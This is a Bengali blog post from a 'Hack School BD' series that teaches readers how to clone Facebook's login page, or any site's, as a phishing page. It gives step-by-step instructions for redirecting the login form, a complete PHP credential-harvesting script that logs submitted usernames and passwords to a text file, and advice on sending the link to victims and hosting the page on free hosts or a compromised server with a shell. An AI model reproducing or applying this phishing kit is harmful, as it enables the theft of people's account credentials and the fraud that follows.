Thursday, May 28, 2015

হ্যাক স্কুল বিডিঃ একদম সহজে যেকোনো ওয়েবসাইটের ফিশিং পেইজ তৈরি করুন!!

আসুন প্রথমেই জানি ফিশিং কিঃ ফিশিং হচ্ছে হ্যাকিং এর অত্যন্ত কার্যকর একটি মেথড , যেটাতে হ্যাকার  কোনো ওয়েবসাইটের
নকল আরেকটি ওয়েবসাইট তৈরি করে সেই ওয়েবসাইটের গ্রাহকদের তথ্য হাতিয়ে নেওয়ার জন্যে। ফিশিং মেথড ব্যাবহার করে ক্রেডিট কার্ড, ব্যাংক একাউন্ট,পেপাল একাউন্ট,
ফেইসবুক একাউন্ট, ই-মেইল একাউন্ট ইত্যাদি জনপ্রিয় লেনদেন এবং সোস্যাল মিডিয়া ওয়েবসাইট গুলো থেকে গ্রাহকদের তথ্য হাতিয়ে নিচ্ছে হ্যাকাররা । 
-
আজকে আমি আপনাদের দেখাবো কিভাবে ফেইসবুকের ফিশিং পেইজ তৈরি করতে হয়।
এই পদ্ধতি ব্যাবহার করে আপনি যেকোনো ওয়েবসাইটের ফিশিং পেইজ তৈরি করতে পারবেন :)
চলুন তাহলে শুরু করা যাক।

-

কিভাবে ফেইসবুক ফিশিং পেইজ তৈরি করবেন


১. প্রথমেই ফেইসবুকের ওয়েবসাইটের যানঃ Facebook.com এবং মাউসের রাইট বাটনে ক্লিক করলে আপনি view sourceঅপশনটি দেখতে পাবেন ,সেটাতে ক্লিক করুন ।

অথবা control+u চাপুন সে ক্ষেত্রেও আপনি সোর্স কোড দেখতে পাবেন।
২. নতুন একটি ট্যাব ওপেন হবে যেখানে ফেইসবুকের সোর্স কোড দেখতে পাবেন।

৩. সোর্স কোডটি কপি করে নোটপ্যাডে পেস্ট করুন (আমি নোটপ্যাড++ ব্যাবহার করছি) কন্ট্রোল+এফ (Control+F)  চাপুন find box  ওপেন হবে সেখানে এই লেখাটির জন্যে সার্চ করুন "action=https://www.facebook.com/login.php?login_attempt=1"


৪. অন্য যেকোনো ওয়েবসাইটের ফিশিং বানাতে চাইলে action= লেখাটির জন্যে সার্চ করুন..
৫. লেখাটি খুজে বের করার পর https://www.facebook.com/login.php?login_attempt=1 এই লিঙ্ক টি       মুছে দিয়ে সেখানে লেখুন post.php
এবার সোর্স কোড ফাইলটি index.htm নামে সেইভ করুন ।
৬. এবার নতুন ভাবে নোটপ্যাড খুলে এই কোড টি লেখে  post.php নামে সেইভ করুনঃ
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
৭. এখন আপনার কাছে আছে দুটি ফাইল index.htm এবং post.php
মনে রাখবেন ফাইল এক্সটেনশ এ ক্ষেত্রে গুরুত্বপূর্ন , যদি ভুল থাকে তাহলে কাজ হবে না ।।
৮. এখন ফিশিং ফাইল দুটি আপনি ফ্রি হোস্টিং এ আপলোড দিতে পারেন।
৯.আপনি ভিকটিমকে আপনার ফিশিং পেইজের লিঙ্ক দেওয়ার পরে, ভিকটিম যদি লগিন করে তাহলে আপনি যে ডিরেক্টরি তে ফিশিং পেইজ এবং post.php ফাইলদুটি আপলোড দিয়েছেন সেখানে usernames.txt নামে একটি ফাইল তৈরি হবে যেখানে আপনি ভিকটিমের প্রবেশ করানো তথ্য দেখতে পাবেন।

 

তবে ফ্রি হোস্টিং সাইট গুলো ফিশিং সাইট আপলোড হওয়ার।কিছুক্ষনের ভিতরেই রিমুভ করে দেয়। সে ক্ষেত্রে আপনার কাছে যদি কোনো শেল আপলোড করা সার্ভার থাকে সেখানে আপলোড দিতে পারেন।

No comments: